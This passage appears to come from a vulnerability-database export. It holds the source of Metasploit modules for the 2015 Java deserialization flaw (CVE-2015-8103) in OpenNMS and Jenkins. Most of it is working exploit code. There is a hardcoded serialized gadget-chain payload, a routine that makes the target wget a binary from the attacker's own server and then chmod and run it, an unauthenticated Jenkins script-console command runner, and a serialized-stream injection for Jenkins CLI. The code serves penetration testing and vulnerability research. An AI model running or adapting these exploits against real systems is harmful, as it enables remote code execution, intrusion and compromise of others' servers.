Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Java::Rmi::Client\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'OpenNMS Java Object Unserialization Remote Code Execution',\n 'Description' => %q(\n This module exploits a vulnerability in the OpenNMS Java object which allows\n an unauthenticated attacker to run arbitrary code against the system.\n ),\n 'Author' =>\n [\n 'Ben Turner <benpturner[at]yahoo.com>', # @benpturner\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-8103' ],\n [ 'URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/' ]\n ],\n 'Targets' =>\n [\n [ 'OpenNMS / Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],\n [ 'OpenNMS / Linux x86_64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 06 2015'\n )\n )\n\n register_options(\n [\n Opt::RPORT(1099),\n OptString.new('WRITABLEDIR', [false, 'A writable directory on the host', '/tmp/'])\n ])\n end\n\n # This is the execute function that is re-used throughout\n def exec_command(cmd)\n vprint_status(\"#{peer} - Downloading the file #{cmd}\")\n\n # Do the exploit command bit\n data1 = \"\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b\"\n data2 = \"\\x00\\x09\\x31\\x32\\x37\\x2E\\x30\\x2E\\x31\\x2E\\x31\\x00\\x00\\x00\\x00\\x50\\xAC\\xED\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4D\\xC9\\xD4\\xE6\\x3B\\xDF\\x74\\x00\\x05\\x70\\x77\\x6E\\x65\\x64\\x73\\x7D\\x00\\x00\\x00\\x01\\x00\\x0F\\x6A\\x61\\x76\\x61\\x2E\\x72\\x6D\\x69\\x2E\\x52\\x65\\x6D\\x6F\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x72\\x65\\x66\\x6C\\x65\\x63\\x74\\x2E\\x50\\x72\\x6F\\x78\\x79\\xE1\\x27\\xDA\\x20\\xCC\\x10\\x43\\xCB\\x02\\x00\\x01\\x4C\\x00\\x01\\x68\\x74\\x00\\x25\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x72\\x65\\x66\\x6C\\x65\\x63\\x74\\x2F\\x49\\x6E\\x76\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\\x48\\x61\\x6E\\x64\\x6C\\x65\\x72\\x3B\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6E\\x2E\\x72\\x65\\x66\\x6C\\x65\\x63\\x74\\x2E\\x61\\x6E\\x6E\\x6F\\x74\\x61\\x74\\x69\\x6F\\x6E\\x2E\\x41\\x6E\\x6E\\x6F\\x74\\x61\\x74\\x69\\x6F\\x6E\\x49\\x6E\\x76\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\\x48\\x61\\x6E\\x64\\x6C\\x65\\x72\\x55\\xCA\\xF5\\x0F\\x15\\xCB\\x7E\\xA5\\x02\\x00\\x02\\x4C\\x00\\x0C\\x6D\\x65\\x6D\\x62\\x65\\x72\\x56\\x61\\x6C\\x75\\x65\\x73\\x74\\x00\\x0F\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x75\\x74\\x69\\x6C\\x2F\\x4D\\x61\\x70\\x3B\\x4C\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x43\\x6C\\x61\\x73\\x73\\x3B\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6A\\x61\\x76\\x61\\x2E\\x75\\x74\\x69\\x6C\\x2E\\x48\\x61\\x73\\x68\\x4D\\x61\\x70\\x05\\x07\\xDA\\xC1\\xC3\\x16\\x60\\xD1\\x03\\x00\\x02\\x46\\x00\\x0A\\x6C\\x6F\\x61\\x64\\x46\\x61\\x63\\x74\\x6F\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6F\\x6C\\x64\\x70\\x78\\x70\\x3F\\x40\\x00\\x00\\x00\\x00\\x00\\x0C\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7E\\x00\\x00\\x73\\x71\\x00\\x7E\\x00\\x05\\x73\\x7D\\x00\\x00\\x00\\x01\\x00\\x0D\\x6A\\x61\\x76\\x61\\x2E\\x75\\x74\\x69\\x6C\\x2E\\x4D\\x61\\x70\\x70\\x78\\x71\\x00\\x7E\\x00\\x02\\x73\\x71\\x00\\x7E\\x00\\x05\\x73\\x72\\x00\\x2A\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x6D\\x61\\x70\\x2E\\x4C\\x61\\x7A\\x79\\x4D\\x61\\x70\\x6E\\xE5\\x94\\x82\\x9E\\x79\\x10\\x94\\x03\\x00\\x01\\x4C\\x00\\x07\\x66\\x61\\x63\\x74\\x6F\\x72\\x79\\x74\\x00\\x2C\\x4C\\x6F\\x72\\x67\\x2F\\x61\\x70\\x61\\x63\\x68\\x65\\x2F\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2F\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2F\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x3B\\x70\\x78\\x70\\x73\\x72\\x00\\x3A\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x66\\x75\\x6E\\x63\\x74\\x6F\\x72\\x73\\x2E\\x43\\x68\\x61\\x69\\x6E\\x65\\x64\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x30\\xC7\\x97\\xEC\\x28\\x7A\\x97\\x04\\x02\\x00\\x01\\x5B\\x00\\x0D\\x69\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x73\\x74\\x00\\x2D\\x5B\\x4C\\x6F\\x72\\x67\\x2F\\x61\\x70\\x61\\x63\\x68\\x65\\x2F\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2F\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2F\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x3B\\x70\\x78\\x70\\x75\\x72\\x00\\x2D\\x5B\\x4C\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x3B\\xBD\\x56\\x2A\\xF1\\xD8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3B\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x66\\x75\\x6E\\x63\\x74\\x6F\\x72\\x73\\x2E\\x43\\x6F\\x6E\\x73\\x74\\x61\\x6E\\x74\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xB1\\x94\\x02\\x00\\x01\\x4C\\x00\\x09\\x69\\x43\\x6F\\x6E\\x73\\x74\\x61\\x6E\\x74\\x74\\x00\\x12\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3B\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x52\\x75\\x6E\\x74\\x69\\x6D\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3A\\x6F\\x72\\x67\\x2E\\x61\\x70\\x61\\x63\\x68\\x65\\x2E\\x63\\x6F\\x6D\\x6D\\x6F\\x6E\\x73\\x2E\\x63\\x6F\\x6C\\x6C\\x65\\x63\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x66\\x75\\x6E\\x63\\x74\\x6F\\x72\\x73\\x2E\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x72\\x54\\x72\\x61\\x6E\\x73\\x66\\x6F\\x72\\x6D\\x65\\x72\\x87\\xE8\\xFF\\x6B\\x7B\\x7C\\xCE\\x38\\x02\\x00\\x03\\x5B\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3B\\x4C\\x00\\x0B\\x69\\x4D\\x65\\x74\\x68\\x6F\\x64\\x4E\\x61\\x6D\\x65\\x74\\x00\\x12\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x53\\x74\\x72\\x69\\x6E\\x67\\x3B\\x5B\\x00\\x0B\\x69\\x50\\x61\\x72\\x61\\x6D\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2F\\x6C\\x61\\x6E\\x67\\x2F\\x43\\x6C\\x61\\x73\\x73\\x3B\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3B\\x90\\xCE\\x58\\x9F\\x10\\x73\\x29\\x6C\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0A\\x67\\x65\\x74\\x52\\x75\\x6E\\x74\\x69\\x6D\\x65\\x75\\x72\\x00\\x12\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x43\\x6C\\x61\\x73\\x73\\x3B\\xAB\\x16\\xD7\\xAE\\xCB\\xCD\\x5A\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4D\\x65\\x74\\x68\\x6F\\x64\\x75\\x71\\x00\\x7E\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x53\\x74\\x72\\x69\\x6E\\x67\\xA0\\xF0\\xA4\\x38\\x7A\\x3B\\xB3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7E\\x00\\x24\\x73\\x71\\x00\\x7E\\x00\\x1C\\x75\\x71\\x00\\x7E\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7E\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6E\\x76\\x6F\\x6B\\x65\\x75\\x71\\x00\\x7E\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4F\\x62\\x6A\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7E\\x00\\x21\\x73\\x71\\x00\\x7E\\x00\\x1C\\x75\\x72\\x00\\x13\\x5B\\x4C\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x53\\x74\\x72\\x69\\x6E\\x67\\x3B\\xAD\\xD2\\x56\\xE7\\xE9\\x1D\\x7B\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\"\n data2 += cmd.length.chr\n data2 += cmd\n data2 += \"\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7E\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7E\\x00\\x29\\x73\\x71\\x00\\x7E\\x00\\x17\\x73\\x72\\x00\\x11\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x49\\x6E\\x74\\x65\\x67\\x65\\x72\\x12\\xE2\\xA0\\xA4\\xF7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6C\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4E\\x75\\x6D\\x62\\x65\\x72\\x86\\xAC\\x95\\x1D\\x0B\\x94\\xE0\\x8B\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7E\\x00\\x09\\x3F\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6A\\x61\\x76\\x61\\x2E\\x6C\\x61\\x6E\\x67\\x2E\\x4F\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7E\\x00\\x3F\\x78\\x71\\x00\\x7E\\x00\\x3F\"\n\n begin\n connect\n sock.put(data1)\n\n # Wait for a successful response\n data = recv_protocol_ack # rescue nil\n unless data\n fail_with(Failure::Unknown, \"This system has not responded with the correct RMI header\")\n end\n\n # Send the RMI payload\n sock.put(data2)\n\n # Disconnect\n disconnect\n\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the host\")\n end\n end\n\n # Wget the file onto the host in the temp directory\n def wget_payload\n resource_uri = '/' + @dropped_elf\n\n if datastore['SRVHOST'] == \"0.0.0.0\" || datastore['SRVHOST'] == \"::\"\n srv_host = Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n\n vprint_status(\"#{peer} - Starting up our web service on #{service_url} ...\")\n start_service(\n 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }\n )\n\n exec_command(\"wget -P #{datastore['WRITABLEDIR']} #{service_url}\")\n\n Rex.sleep(15)\n end\n\n # Change permissions to permit binary execution\n def chmod_payload\n cmd = \"chmod +x #{File.join(datastore['WRITABLEDIR'], @dropped_elf)}\"\n\n vprint_status(\"#{peer} - Chmod the payload...\")\n res = exec_command(cmd)\n\n fail_with(Failure::Unknown, \"#{peer} - Unable to chmod payload\") unless res\n\n Rex.sleep(1)\n end\n\n # Execute payload on host\n def exec_payload\n cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)\n\n vprint_status(\"#{peer} - Executing the payload...\")\n res = exec_command(cmd)\n\n fail_with(Failure::Unknown, \"#{peer} - Unable to exec payload\") unless res\n\n Rex.sleep(1)\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, _request)\n vprint_status(\"#{peer} - Sending the payload to the server...\")\n send_response(cli, generate_payload_exe)\n end\n\n # Create the payload and run the commands in succcession\n def exploit\n print_status(\"#{peer} - Exploting the vulnerable service...\")\n\n @payload_url = ''\n @dropped_elf = rand_text_alpha(rand(5) + 3)\n\n wget_payload\n chmod_payload\n exec_payload\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/opennms_java_serialize.rb"}, {"lastseen": "2019-12-02T14:15:36", "bulletinFamily": "exploit", "description": "This module scans for unauthenticated Jenkins-CI script consoles and executes the specified command.\n", "modified": "2017-07-24T13:26:21", "published": "2015-09-02T20:12:05", "id": "MSF:AUXILIARY/SCANNER/HTTP/JENKINS_COMMAND", "href": "", "type": "metasploit", "title": "Jenkins-CI Unauthenticated Script-Console Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/http'\nrequire 'cgi'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins-CI Unauthenticated Script-Console Scanner',\n 'Description' => %q{\n This module scans for unauthenticated Jenkins-CI script consoles and\n executes the specified command.\n },\n 'Author' =>\n [\n 'altonjx',\n 'Jeffrey Cap'\n ],\n 'References' =>\n [\n ['CVE', '2015-8103'], # see link and validate, https://highon.coffee/blog/jenkins-api-unauthenticated-rce-exploit/ states this is another issue\n ['URL', 'https://jenkins.io/security/advisory/2015-11-11/'],\n ['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'],\n ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'],\n ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ]),\n OptString.new('COMMAND', [ true, 'Command to run in application', 'whoami' ]),\n ])\n end\n\n def fingerprint_os(ip)\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path,\"systemInfo\")})\n\n # Verify that we received a proper systemInfo response\n unless res && res.body.to_s.length > 0\n vprint_error(\"#{peer} - The server did not reply to our systemInfo request\")\n return\n end\n\n unless res.body.index(\"System Properties\") &&\n res.body.index(\"Environment Variables\")\n if res.body.index('Remember me on this computer')\n vprint_error(\"#{peer} This Jenkins-CI system requires authentication\")\n else\n vprint_error(\"#{peer} This system is not running Jenkins-CI at #{datastore['TARGETURI']}\")\n end\n return\n end\n\n host_info = {}\n if (res.body =~ /\"\\.crumb\", \"([a-z0-9]*)\"/)\n print_status(\"#{peer} Using CSRF token: '#{$1}'\")\n host_info[:crumb] = $1\n\n sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]\n host_info[:cookie] = \"#{sessionid}\"\n end\n\n os_info = pattern_extract(/os.name(.*?)os.version/m, res.body).first\n host_info[:prefix] = os_info.index(\">Windows\") ? \"cmd.exe /c \" : \"\"\n host_info\n end\n\n def run_host(ip)\n command = datastore['COMMAND'].gsub(\"\\\\\", \"\\\\\\\\\\\\\")\n\n host_info = fingerprint_os(ip)\n return if host_info.nil?\n prefix = host_info[:prefix]\n\n request_parameters = {\n 'uri' => normalize_uri(target_uri.path,\"script\"),\n 'method' => 'POST',\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' =>\n {\n 'script' => \"def sout = new StringBuffer(), serr = new StringBuffer()\\r\\ndef proc = '#{prefix} #{command}'.execute()\\r\\nproc.consumeProcessOutput(sout, serr)\\r\\nproc.waitForOrKill(1000)\\r\\nprintln \\\"out> $sout err> $serr\\\"\\r\\n\",\n 'Submit' => 'Run'\n }\n }\n request_parameters['cookie'] = host_info[:cookie] unless host_info[:cookie].nil?\n request_parameters['vars_post']['.crumb'] = host_info[:crumb] unless host_info[:crumb].nil?\n res = send_request_cgi(request_parameters)\n\n unless res && res.body.to_s.length > 0\n vprint_error(\"#{peer} No response received from the server.\")\n return\n end\n\n plugin_output, command_output = pattern_extract(/<pre>(.*?)<\\/pre>/m, res.body.to_s)\n\n if plugin_output !~ /Jenkins\\.instance\\.pluginManager\\.plugins/\n vprint_error(\"#{peer} The server returned an invalid response.\")\n return\n end\n\n # The output is double-HTML encoded\n output = CGI.unescapeHTML(CGI.unescapeHTML(command_output.to_s)).\n gsub(/\\s*(out|err)>\\s*/m, '').\n strip\n\n if output =~ /^java\\.[a-zA-Z\\.]+\\:\\s*([^\\n]+)\\n/\n output = $1\n print_good(\"#{peer} The server is vulnerable, but the command failed: #{output}\")\n else\n output.split(\"\\n\").each do |line|\n print_good(\"#{peer} #{line.strip}\")\n end\n end\n\n report_vulnerable(output)\n\n end\n\n def pattern_extract(pattern, buffer)\n buffer.to_s.scan(pattern).map{ |m| m.first }\n end\n\n def report_vulnerable(result)\n report_vuln(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :sname => ssl ? 'https' : 'http',\n :name => self.name,\n :info => result,\n :refs => self.references,\n :exploited_at => Time.now.utc\n )\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/jenkins_command.rb"}, {"lastseen": "2019-11-30T10:32:46", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on the Jenkins master, which allows remote arbitrary code execution. Authentication is not required to exploit this vulnerability.\n", "modified": "2019-02-22T23:01:49", "published": "2015-12-11T20:57:10", "id": "MSF:EXPLOIT/LINUX/MISC/JENKINS_JAVA_DESERIALIZE", "href": "", "type": "metasploit", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\n the Jenkins master, which allows remote arbitrary code execution. Authentication is not\n required to exploit this vulnerability.\n },\n 'Author' =>\n [\n 'Christopher Frohoff', # Vulnerability discovery\n 'Steve Breen', # Public Exploit\n 'Dev Mohanty', # Metasploit module\n 'Louis Sato', # Metasploit\n 'wvu', # Metasploit\n 'juan vazquez', # Metasploit\n 'Wei Chen' # Metasploit\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8103'],\n ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],\n ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],\n ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'Jenkins 1.637', {} ]\n ],\n 'DisclosureDate' => 'Nov 18 2015',\n 'DefaultTarget' => 0))\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),\n OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),\n Opt::RPORT('8080')\n ])\n\n register_advanced_options([\n OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])\n ])\n end\n\n def cli_port\n @jenkins_cli_port || datastore['XJenkinsCliPort']\n end\n\n def exploit\n if cli_port == 0 && !vulnerable?\n fail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\")\n end\n invoke_remote_method(set_payload)\n invoke_remote_method(class_load_payload)\n end\n\n\n # This is from the HttpClient mixin. But since this module isn't actually exploiting\n # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &\n # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.\n\n def target_uri\n begin\n # In case TARGETURI is empty, at least we default to '/'\n u = datastore['TARGETURI']\n u = \"/\" if u.nil? or u.empty?\n URI(u)\n rescue ::URI::InvalidURIError\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\n raise Msf::OptionValidateError.new(['TARGETURI'])\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * \"/\"\n\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\n\n # Makes sure there's a starting slash\n unless new_str[0,1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def check\n result = Exploit::CheckCode::Safe\n\n begin\n if vulnerable?\n result = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n return Exploit::CheckCode::Unknown\n end\n\n result\n end\n\n def vulnerable?\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path)\n })\n\n unless res\n fail_with(Failure::Unknown, 'The connection timed out.')\n end\n\n http_headers = res.headers\n\n unless http_headers['X-Jenkins-CLI-Port']\n vprint_error('The server does not have the CLI port that is needed for exploitation.')\n return false\n end\n\n if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637\n @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i\n return true\n end\n\n false\n end\n\n # Connects to the server, creates a request, sends the request,\n # reads the response\n #\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\n #\n def send_request_cgi(opts={}, timeout = 20)\n if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0\n actual_timeout = datastore['HttpClientTimeout']\n else\n actual_timeout = opts[:timeout] || timeout\n end\n\n begin\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\n c.connect\n r = c.request_cgi(opts)\n c.send_recv(r, actual_timeout)\n rescue ::Errno::EPIPE, ::Timeout::Error\n nil\n end\n end\n\n def invoke_remote_method(serialized_java_stream)\n begin\n socket = connect(true, {'RPORT' => cli_port})\n\n print_status 'Sending headers...'\n socket.put(read_bin_file('serialized_jenkins_header'))\n\n vprint_status(socket.recv(1024))\n vprint_status(socket.recv(1024))\n\n encoded_payload0 = read_bin_file('serialized_payload_header')\n encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)\n encoded_payload2 = read_bin_file('serialized_payload_footer')\n\n encoded_payload = \"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\"\n print_status \"Sending payload length: #{encoded_payload.length}\"\n socket.put(encoded_payload)\n ensure\n disconnect(socket)\n end\n\n end\n\n def print_status(msg='')\n super(\"#{rhost}:#{rport} - #{msg}\")\n end\n\n #\n # Serialized stream generated with:\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java\n #\n def set_payload\n stream = Rex::Java::Serialization::Model::Stream.new\n\n handle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb')\n decoded = stream.decode(handle)\n handle.close\n\n inject_payload_into_stream(decoded).encode\n end\n\n #\n # Serialized stream generated with:\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java\n #\n def class_load_payload\n stream = Rex::Java::Serialization::Model::Stream.new\n handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')\n decoded = stream.decode(handle)\n handle.close\n inject_class_loader_into_stream(decoded).encode\n end\n\n def inject_class_loader_into_stream(decoded)\n file_name_utf8 = get_array_chain(decoded)\n .values[2]\n .class_data[0]\n .values[1]\n .values[0]\n .values[0]\n .class_data[3]\n file_name_utf8.contents = get_random_file_name\n file_name_utf8.length = file_name_utf8.contents.length\n class_name_utf8 = get_array_chain(decoded)\n .values[4]\n .class_data[0]\n .values[0]\n class_name_utf8.contents = 'metasploit.Payload'\n class_name_utf8.length = class_name_utf8.contents.length\n decoded\n end\n\n def get_random_file_name\n @random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\"\n end\n\n def inject_payload_into_stream(decoded)\n byte_array = get_array_chain(decoded)\n .values[2]\n .class_data\n .last\n byte_array.values = payload.encoded.bytes\n file_name_utf8 = decoded.references[44].class_data[0]\n rnd_fname = get_random_file_name\n register_file_for_cleanup(rnd_fname)\n file_name_utf8.contents = rnd_fname\n file_name_utf8.length = file_name_utf8.contents.length\n decoded\n end\n\n def get_array_chain(decoded)\n object = decoded.contents[0]\n lazy_map = object.class_data[1].class_data[0]\n 